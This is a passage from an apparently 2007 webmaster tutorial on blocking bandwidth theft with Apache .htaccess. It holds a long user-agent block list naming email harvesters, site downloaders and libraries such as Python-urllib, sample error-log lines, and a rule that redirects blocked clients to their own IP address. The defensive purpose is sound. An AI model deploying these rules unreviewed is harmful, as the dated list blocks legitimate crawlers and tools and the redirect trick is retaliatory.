RewriteCond %{HTTP_USER_AGENT} ^(Crescent|digout4uagent|disco|dumbot|Digger) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(DigOut4U|Deweb|Digimarc|DittoSpyder|DIIbot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Download\ Demon|ecollector|eCatch|EirGrabber|EmailCollector) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(EmailSiphon|EmailWolf|EO\ Browse|Eval|Express\ WebPictures) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(ExtractorPro|EyeNetIE|fastlwspider|FairAd\ Client|FAST) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(FEZhead|FavOrg|Favorites\.Sweeper|Fetch|FlashGet) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Foobot|FreeFind|Generic|Getleft|GetURL) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(GetWebPage|Go!Zilla|Go-Ahead-Got-It|Googlebot-Image|GrabNet) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Grafula|Hatena\ Antenna|hloader|humanlinks|HMView) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(HomePageSearch|iSiloWeb|IBM_Planetwide|Image\ Stripper|Image\ Sucker) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(IncyWincy|InfoNaviRobot|Ingelin|InterGET|Internet\ Explore\ 5\.x) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Internet\ Ninja|JennyBot|JoBo|JOC\ Web\ Spider|Kenjin\ Spider) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(KWebGet|larbin|leech|libwww-perl|LeechFTP) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(LexiBot|LinkWalker|LNSpiderguy|Mata\ Hari|MCspider) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Microsoft\.URL|MIDown\ tool|MSFrontPage|MS\ FrontPage|MSProxy) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Mass\ Downloader|MSIECrawler|Mirror|Mister\ PiX|naver) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(netattache|netprospector|nicerspro|nost\.info|NPBot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Navroad|NearSite|Net\.Vampire|NetAnts|NetAttache) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(NetCarta|NetMechanic|NetResearchServer|NetSpider|NetZIP) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Net\ Vampire|NexTools\ WebAgent|NICErsPRO|Octopus|Offline\ Explorer) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Offline\ Navigator|OmniExplorer_Bot|OpaL|OpenTextSiteCrawler|Openfind) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(OrangeBot|pavuk|pcBrowser|psbot|Port\ Huron\ Labs) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(PSurf|PackRat|PageGrabber|PageDown|Papa\ Foto) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(ParaSite|Plucker|ProWebWalker|PushSite|Python-urllib) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(reget|ReGet|RealDownload|RepoMonkey|Robozilla) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Rover|Rsync|RMA|searchterms\.it|sitecheck) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Searchworks\ Spider|ScoutAbout|Shai|Siphon|SiteSnagger) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(SiteMapper|SmartDownload|Spegla|SpankBot|spanner) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(SpiderBot|SqWorm|Stanford\ Comp\ Sci|SuperBot|SuperHTTP) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Surf|Surfbot|SurfWalker|tAkeOut|tarspider) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(toCrawl/UrlDispatcher|turingos|TheNomad|Telesoft|Templeton) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(The\ Intraformant|Titan|UIowaCrawler|UtilMind|URL2File) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(URL_Spider_Pro|URLy\ Warning|vspider|VoidEYE|VCI) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Web2Map|web\.by\.mail|w3mir|Webdup|webvac) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(webwalk|wbdbot|web\.by\.mail|Webrobot|webvac) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(webwalk|Widow|WWW-Collector-E|www\.pl|WebBandit) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(WebEMailExtrac|WEBMASTERS|WISEbot|WebAuto|WebCopier) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(WebCopy|WebEnhancer|WebFetch|WebmasterWorldForumBot|WebMiner) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(WebReaper|WebSauger|Website\ Quester|WebSnake|WebStripper) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(WebVac|WebWhacker|Web\ Image\ Collector|Web\ Sucker|WebStripper) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(WebTwin|WebVCR|Website\ eXtractor|WebSnake|WebStripper) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(WhosTalking|WUMPUS|WWWOFFLE|XGET|Xaldon\ WebSpider)
RewriteRule ^.* - [F,L]
</IfModule>

So how do we know if all this stuff is working or not? Whenever anyone sends a request to your site and it fails for any reason, the failure gets logged in the Apache Error Log. An entry there is similar to an access log entry, but it usually contains different information. Actually, the error log is easier to read. Your error log will have entries similar to the following if the blocks you have written are working correctly. In this case the script is returning a custom 403 page to the bad guy, so we show both entries for your review (they have been sanitized for public consumption but they did come from a real log file).
If you don't have a custom page, it generates a generic page and you get a 404 file not found on the 403 message line instead.

[Mon Dec 18 15:34:34 2006] [error] [client 65.162.187.20] client denied by server configuration: /home/username/public_html
[Mon Dec 18 15:34:34 2006] [error] [client 65.162.187.20] client denied by server configuration: /home/username/public_html/403.shtml

The example presented is in reference to one of the "deny from" IP statements. The error message for a bad bot ban would be similar.

Another way to figure out if your blocks are working is to modify the rule so that it redirects the request back to the requester's own IP address using REMOTE_ADDR. For example:

RewriteRule ^(.*) http://%{REMOTE_ADDR}/ [R=301,L]

This rule is supposed to return an access denied screen to the IP address, which will actually just "time out", but you can see the attempt to access the IP address on the status bar when it tries to make the attempt. If you see the attempted access, that means your script blocked the attempt. Otherwise, you will see your normal screen. This is particularly useful if you are blocking a spammer: their script won't work, they usually won't see the redirect back to them, and they won't like it because the whole operation will take too long with the time out and all.

Summary

In the long run, bandwidth conservation is a matter of diligence. If you keep on top of it, you can prevent most of the bad guys from exploiting you and your site. Now that you have a basic understanding of the issues you have to manage, you will be able to control much of the bandwidth theft that occurs on your site. With this new level of confidence and the tools provided, you are now able to manually analyze your log files to see how your bandwidth is being used and, if it is being abused, to see where your resources are going and who is using them.
By creating and customizing .htaccess files using mod_rewrite and SetEnvIfNoCase, you are able to write effective procedures to block bad guys from sucking up your bandwidth resources. You are able to explain the most common ways that your bandwidth can be abused and to develop and deploy multiple solutions to each, including site downloaders, email harvesters, bad robots and media/content thieves. You are now able to find hotlinkers in your log files, deploy effective procedures to block their access to your system and redirect them to some other appropriate resource of your choosing. You are now able to make intelligent choices about the methods you want to deploy to curtail any abuse of your bandwidth and/or website. Finally, you are able to provide proactive solutions that add a measure of security to your site to prevent bandwidth theft.

Conclusion

We have tried to present a balanced overview of bandwidth theft and some ideas (some controversial, for sure) on how you can solve some of the problems with it. In the end, each owner/operator has to deploy the solution that works for their business. IP banning, blacklists and privacy are all sensitive and controversial issues. Although the final decisions are a matter of personal preference, ultimately they need to promote the continued success of the business and stimulate a healthy ROI if possible. Therefore deployment decisions need to reflect the best interest of the business first and foremost.

You are ultimately responsible for your business and its success or failure. So, you need to work out for yourself how much time you can commit to fighting bandwidth theft on your site. For sure, bandwidth conservation is a balance between prevention and abuse. If you are not overwhelmed by massive attacks on your system, perhaps the best way to combat the problem is to be diligent and update your .htaccess file regularly to make sure you include any new threats you discover.
You will probably need to do some benchmarks to determine what "regular updates" means for your particular situation. If, on the other hand, you are swamped with a number of the issues we have listed, maybe you need to seek some alternatives to help you out with the task.

The worst thing you can do if you have a problem is nothing. Guaranteed, the problem will not solve itself and will only get worse if it is not addressed in some manner. You probably wouldn't dream of letting your email box fill up with spam without making some effort to filter out the garbage. Your bandwidth bandits are no different. You need to develop an effective and hopefully proactive plan to short-circuit or curtail unauthorized access to your site.

We hope this tutorial has provided some useful information and instruction to enable your efforts to be successful. Certainly, if you need help or further advice on resolving some problems, feel free to contact us. We are always willing to help.

What's next?

Now that you are able to correctly interpret your log file contents, you might want to move on to any of a number of commercial and open-source tools that you can use to process and display your log data. They usually take a log file, analyze its contents, and create a series of web pages with the relevant statistics. So, you might want to check into one of the following open source packages, if you don't already have them available on your server:

* Webalizer
* Visitors
Author: Webmaster - AllAboutDatingSites
AllAboutDatingSites is a privately held, wholly owned internet company. Its primary function is to bring Dating Software Owners and Operators together with technology solutions providers to assist, to educate, to communicate and to support the Dating Software community. For additional information about AllAboutDatingSites and how it can help you, contact webmaster @ allaboutdatingsites.com Rev. III © 2007 - AllAboutDatingSites - All Rights Reserved